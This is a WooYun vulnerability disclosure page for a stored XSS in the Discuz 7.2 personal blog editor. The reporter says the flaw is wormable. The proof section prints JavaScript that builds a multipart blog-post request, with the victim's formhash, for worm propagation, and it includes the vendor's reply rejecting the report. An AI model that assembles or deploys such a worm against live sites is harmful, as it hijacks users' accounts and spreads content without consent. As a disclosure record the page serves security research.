当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0931

漏洞标题:Discuz 7.2 存储型XSS

相关厂商:Discuz!

漏洞作者: Liscker

提交时间:2010-12-11 11:09

修复时间:2010-12-14 11:05

公开时间:2010-12-14 11:05

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-12-11: 细节已通知厂商并且等待厂商处理中
2010-12-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Discuz 7.2 存储型XSS,可编写蠕虫传播。

详细说明:

discuz 7.2 个人空间发表博客,默认管理员可编辑源码,但管理员可在后台设置权限允许普通用户编辑。
该处存在XSS弱点,可编写蠕虫进行传播。每个用户的表单hash值可在html获得,不需要考虑salt,获得cookie即可。

漏洞证明:

discuz 7.2 进行表单提交时每个用户的表单hash值不一样,但是固定的,该值可在访问用户的html中获得。如图:


然后将hash代入组包,编写蠕虫即可。
var userurl="http://demo.com/cp.php?ac=blog&blogid=&releas=2";
var fdata="-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"subject\"\n\n123\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"classid\"\n\n0\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"message\"\n\n<DIV>123</DIV>\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"tag\"\n\n\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"friend\"\n\n0\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"selectgroup\"\n\n\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"target_names\"\n\n\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"blogsubmit\"\n\ntrue\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"bbsis\"\n\n0\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"fid\"\n\n4\n-----------------------------7da26139230652\nContent-Disposition: form-data; name=\"formhash\"\n\n9186ab85\n-----------------------------7da26139230652--\n";
xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------7da26139230652");

修复方案:

你们经验更丰富。

版权声明:转载请注明来源 Liscker@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2010-12-14 11:05

厂商回复:

后台用户组设置处:
日志全HTML标签支持处,已注明:
谨慎允许,支持所有html标签可能会造成javascript脚本引起的不安全因素 。
不认为这是一个漏洞。

漏洞Rank:3 (WooYun评价)

最新状态:

暂无